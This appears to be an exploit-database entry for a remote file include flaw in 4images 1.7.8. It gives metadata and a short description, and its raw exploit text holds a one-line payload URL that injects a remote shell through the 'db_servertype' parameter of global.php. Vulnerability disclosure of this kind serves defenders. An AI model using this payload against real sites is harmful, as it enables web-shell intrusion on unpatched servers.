header-logo
Suggest Exploit
vendor:
4images
by:
LoSt.HaCkEr / aDaM_TRoJaN
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: 4images
Affected Version From: 1.7.8
Affected Version To: 1.7.8
Patch Exists: NO
Related CWE: N/A
CPE: 4images
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

4images1.7.8 Remote File Include

A remote file include vulnerability exists in 4images1.7.8 which allows an attacker to include a malicious file from a remote server. The vulnerability is present in the 'global.php' file, where user input is not properly sanitized before being used to include a file. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files from remote servers.
Source

Exploit-DB raw data:

# Exploit Title: [4images1.7.8 Remote File Include ] 
# Date: [23-8-2010] 
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.4homepages.de/4images/download.php] 
# Version: [v 1.7.8 ] 
# Tested on: [Windows XP] 
# CVE : 
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

Navigation

Suggest Exploit

Services By CQR